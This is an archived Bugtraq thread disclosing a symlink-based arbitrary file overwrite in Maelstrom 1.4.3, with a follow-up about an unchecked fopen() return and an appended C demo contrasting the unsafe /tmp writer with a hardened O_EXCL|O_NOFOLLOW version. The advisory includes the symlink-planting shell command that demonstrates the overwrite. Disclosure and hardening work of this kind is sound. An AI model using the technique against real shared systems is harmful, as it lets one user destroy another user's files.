7850239 2002-01-20 20:16 +1100  /42 lines/ Andrew Griffiths <andrewg@tasmail.com>
Sent by: joel@lysator.liu.se
Imported: 2002-01-20  23:13  by Brevbäraren
External recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20596>
Subject: Maelstrom 1.4.3 arbitrary file overwrite
------------------------------------------------------------
From: "Andrew Griffiths" <andrewg@tasmail.com>
To: bugtraq@securityfocus.com
Message-ID: <200201200916.g0K9GUT13172@franklin.nt.tas.gov.au>

Program: Maelstrom
Version: 1.4.3
Distribution: RedHat 7.1

When trying to break stuff, ltracing Maelstrom showed the following:

fopen("/tmp/f", "w")                              = 0x08081f58
fprintf(0x08081f58, "Main program = %s\n", "Maelstrom") = 25
fclose(0x08081f58)                                = 0

Which made me wonder if it followed symbolic links, by doing

[andrewg@blackhole andrewg]$ rm -f /tmp/f; (umask 077; echo bla > /tmp/bla; \
ln -s /tmp/bla f)

at which point I ran it again, and when I did cat /tmp/bla, I got

Main program = Maelstrom

Conclusion:
-=-=-=-=-=-

You can overwrite arbitrary files with the permissions of the user
who ran it.

Of course, this won't work on systems that have linking restrictions
in /tmp.

Fixing it
-=-=-=-=-

Remove the code that does the above.


--
www.tasmail.com
(7850239) /Andrew Griffiths <andrewg@tasmail.com>/(Rewrapped)
Comment in text 7858908 by Chris Gragsone <maetrics@realwarp.net>
7858908 2002-01-21 11:26 -0500  /60 lines/ Chris Gragsone <maetrics@realwarp.net>
Sent by: joel@lysator.liu.se
Imported: 2002-01-22  06:13  by Brevbäraren
External recipient: Andrew Griffiths <andrewg@tasmail.com>
External CC recipient: bugtraq@securityfocus.com
Recipient: Bugtraq (import) <20617>
Comment on text 7850239 by Andrew Griffiths <andrewg@tasmail.com>
Subject: Re: Maelstrom 1.4.3 arbitrary file overwrite
------------------------------------------------------------
From: Chris Gragsone <maetrics@realwarp.net>
To: Andrew Griffiths <andrewg@tasmail.com>
Cc: bugtraq@securityfocus.com
Message-ID: <3C4C4143.4050002@realwarp.net>

You should also note that Maelstrom doesn't check the return value of
fopen(), nor does it remove the file when it closes. If you have
multiple users who run Maelstrom, or just someone who wants to break
stuff, and /tmp/f is owned by another user or its permissions are set
to non-writable, Maelstrom will segfault when it passes 0 as the file
stream to fprintf().

--chris

Andrew Griffiths wrote:

> Program: Maelstrom
> Version: 1.4.3
> Distribution: RedHat 7.1
> 
> When trying to break stuff, ltracing Maelstrom showed the following:
> 
> fopen("/tmp/f", "w")                              = 0x08081f58
> fprintf(0x08081f58, "Main program = %s\n", "Maelstrom") = 25
> fclose(0x08081f58)                                = 0
> 
> Which made me wonder if it followed symbolic links, by doing
> 
> [andrewg@blackhole andrewg]$ rm -f /tmp/f; (umask 077; echo bla >  /tmp/bla; \
> ln -s /tmp/bla f)
> 
> at which point I ran it again, and when I did cat /tmp/bla, I got
> 
> Main program = Maelstrom
> 
> Conclusion:
> -=-=-=-=-=-
> 
> You can overwrite arbitrary files with the permissions of the user who ran
> it.
> 
> Of course, this won't work on systems that have linking restrictions in /tmp.
> 
> Fixing it
> -=-=-=-=-
> 
> Remove the code that does the above.
> 
> 
> --
> www.tasmail.com
> 
> 
> 
> 
>
(7858908) /Chris Gragsone <maetrics@realwarp.net>/(Rewrapped)
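Both points in this thread, the write through a symlink at a fixed /tmp name that Andrew traced and the unchecked fopen() return that Chris adds, as an added C example; this is not code from either post and not Maelstrom's own code. It reproduces Andrew's setup (a victim file `bla` and a planted symlink `f` pointing at it) inside a private mkdtemp() directory under $TMPDIR or /tmp, runs the writer pattern seen in the ltrace output against it, and then runs a hardened variant that opens with O_CREAT|O_EXCL|O_NOFOLLOW, mode 0600, and checks every return. The hardened variant is a swapped-in technique of mine, not the "remove the code" fix Andrew suggests; the function names and the scratch path are assumptions.

```c
#define _DEFAULT_SOURCE 1
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* The pattern the ltrace output shows: fopen(path, "w") follows whatever
 * symlink sits at `path`, truncates the target and writes into it. Per
 * Chris's note the real program also skips the NULL check and crashes in
 * fprintf(); this copy returns -1 instead so the demo can continue. */
static int write_info_unsafe(const char *path, const char *name)
{
    FILE *f = fopen(path, "w");
    if (f == NULL)
        return -1;
    fprintf(f, "Main program = %s\n", name);
    fclose(f);
    return 0;
}

/* Hardened variant (added here, not Maelstrom's fix): O_CREAT|O_EXCL fails
 * with EEXIST if anything already exists at `path`, a symlink included;
 * O_NOFOLLOW is a second guard; 0600 keeps other users out; every call is
 * checked. On failure errno is left as the failing call set it. */
static int write_info_safe(const char *path, const char *name)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    FILE *f = fdopen(fd, "w");
    if (f == NULL) { close(fd); return -1; }
    int ok = fprintf(f, "Main program = %s\n", name) >= 0;
    if (fclose(f) != 0)
        ok = 0;
    return ok ? 0 : -1;
}

/* Constructed setup mirroring Andrew's: a fresh private directory under
 * $TMPDIR (or /tmp) holding <scratch>/bla = "bla\n" and <scratch>/f -> bla.
 * Each buffer must be PATH_MAX bytes. Returns 0 on success, -1 otherwise. */
static int plant_symlink(char *scratch, char *victim, char *link)
{
    const char *base = getenv("TMPDIR") ? getenv("TMPDIR") : "/tmp";
    snprintf(scratch, PATH_MAX, "%s/mael-demo.XXXXXX", base);
    if (mkdtemp(scratch) == NULL)
        return -1;
    snprintf(victim, PATH_MAX, "%s/bla", scratch);
    snprintf(link, PATH_MAX, "%s/f", scratch);
    FILE *v = fopen(victim, "w");
    if (v == NULL || fputs("bla\n", v) == EOF || fclose(v) != 0)
        return -1;
    return symlink(victim, link);
}

static void remove_scratch(const char *scratch, const char *victim, const char *link)
{
    unlink(link);
    unlink(victim);
    rmdir(scratch);
}

/* 1 if `path` now holds the line Maelstrom writes, 0 if not, -1 if unreadable. */
static int holds_maelstrom_line(const char *path)
{
    char buf[64] = {0};
    FILE *v = fopen(path, "r");
    if (v == NULL)
        return -1;
    if (fgets(buf, sizeof buf, v) == NULL)
        buf[0] = '\0';
    fclose(v);
    return strcmp(buf, "Main program = Maelstrom\n") == 0;
}

/* 1 when the unsafe writer followed the planted link and overwrote the victim. */
int demo_unsafe_writer(void)
{
    char scratch[PATH_MAX], victim[PATH_MAX], link[PATH_MAX];
    if (plant_symlink(scratch, victim, link) != 0)
        return -1;
    int rc = write_info_unsafe(link, "Maelstrom");
    int result = rc == 0 && holds_maelstrom_line(victim) == 1;
    remove_scratch(scratch, victim, link);
    return result;
}

/* 1 when the hardened writer refused the planted link with EEXIST, left the
 * victim reading "bla", and then succeeded once the link was gone. */
int demo_safe_writer(void)
{
    char scratch[PATH_MAX], victim[PATH_MAX], link[PATH_MAX];
    if (plant_symlink(scratch, victim, link) != 0)
        return -1;
    int refused = write_info_safe(link, "Maelstrom") == -1 && errno == EEXIST;
    int intact = holds_maelstrom_line(victim) == 0;
    unlink(link);                                   /* now a clean path */
    int wrote = write_info_safe(link, "Maelstrom") == 0 && holds_maelstrom_line(link) == 1;
    remove_scratch(scratch, victim, link);
    return refused && intact && wrote;
}

int main(void)
{
    printf("unsafe writer followed the link:  %d\n", demo_unsafe_writer());
    printf("hardened writer refused the link: %d\n", demo_safe_writer());
    return 0;
}
```

Build with `cc -o mael-demo mael-demo.c` and run it; both lines should print 1. O_EXCL turns the overwrite into a refusal, but a fixed name in a shared, world-writable directory is still open to denial of service (anyone can pre-create it), so a real program should use mkstemp() or a directory only it can write, and remove the file when done, which is the second half of Chris's point.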